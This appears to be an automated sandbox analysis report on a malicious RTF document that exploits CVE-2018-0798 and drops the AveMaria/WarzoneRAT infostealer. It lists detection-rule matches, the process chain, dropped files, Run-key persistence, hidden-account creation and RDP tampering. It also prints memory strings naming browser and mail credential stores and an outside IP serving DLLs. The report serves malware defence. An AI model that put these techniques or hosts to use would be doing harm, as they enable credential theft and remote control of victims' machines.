Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.0.gnwnekc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000003.913307044.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000000.911346295.0000000000418000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

5_2_00403640

Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: String function: 00401A10 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: String function: 0040E579 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: String function: 00401A10 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: String function: 004033AB appears 35 times

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winRTF@10/15@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040B5E1 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_0040B5E1

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040D450 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,

8_2_0040D450

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	Virustotal: Detection: 22%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Process created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe C:\Users\user\AppData\Local\Temp\gnwnekc.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe "C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe" "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\A
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Process created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\word.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_00403640
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040D3CA OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,		8_2_0040D3CA

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5659.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_004021AA CoCreateInstance,

5_2_004021AA

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

5_2_00404AB5

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040E80F CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,GetModuleFileNameExW,CloseHandle,Process32NextW,CloseHandle,

8_2_0040E80F

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: wntdll.pdb source: gnwnekc.exe, 00000006.00000003.907310568.0000000019F50000.00000004.00001000.00020000.00000000.sdmp, gnwnekc.exe, 00000006.00000003.907105006.0000000019DF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\xampp\htdocs\5e856c39beb3488c816ca1901b5ae502\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.921515676.0000000002851000.00000004.00000800.00020000.00000000.sdmp, gnwnekc.exe, 00000006.00000002.914389407.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, gnwnekc.exe, 00000006.00000000.902930072.000000000040F000.00000002.00000001.01000000.00000005.sdmp, gnwnekc.exe, 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmp, gnwnekc.exe, 00000008.00000000.906875049.000000000040F000.00000002.00000001.01000000.00000005.sdmp, gnwnekc.exe, 00000008.00000002.1166081575.0000000003250000.00000004.00000800.00020000.00000000.sdmp, wwpicppqkrphnp.exe, 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmp, wwpicppqkrphnp.exe, 00000009.00000000.935537740.000000000040F000.00000002.00000001.01000000.00000007.sdmp, nsmF993.tmp.5.dr, gnwnekc.exe.5.dr, wwpicppqkrphnp.exe.6.dr

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00401130 push eax; ret	8_2_00401144
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00401130 push eax; ret	8_2_0040116C
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00412341 push ebp; retf	8_2_00412344
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B3023 push dword ptr [ecx-3028324Bh]; retf	9_2_003B307F
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B5408 push esp; iretd	9_2_003B5416
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B4100 pushad ; retf	9_2_003B4103
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B4154 push edx; iretd	9_2_003B4167
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B1EB6 push edi; iretd	9_2_003B1EBC
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B46CA push es; ret	9_2_003B46CC
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B3B5E push es; retf	9_2_003B3B5F
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B3343 push E422E837h; retf	9_2_003B3353
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B2FB0 push dword ptr [ecx-3028324Bh]; retf	9_2_003B307F
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_003B2FD5 push dword ptr [ecx-3028324Bh]; retf	9_2_003B307F

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040D56A LoadLibraryA,GetProcAddress,

8_2_0040D56A

Source: gnwnekc.exe.5.dr	Static PE information: section name: .00cfg
Source: gnwnekc.exe.5.dr	Static PE information: section name: .voltbl
Source: wwpicppqkrphnp.exe.6.dr	Static PE information: section name: .00cfg
Source: wwpicppqkrphnp.exe.6.dr	Static PE information: section name: .voltbl

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040B55D NetUserAdd,NetLocalGroupAddMembers,

8_2_0040B55D

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	File created: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\word.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mwele[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\word.exe	File created: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040264B URLDownloadToFileW,ShellExecuteW,

8_2_0040264B

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_004091E6 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,		8_2_004091E6
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00409722 lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,		8_2_00409722

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ldudbg			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ldudbg			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040B64D OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_0040B64D

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: gnwnekc.exe, 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: gnwnekc.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
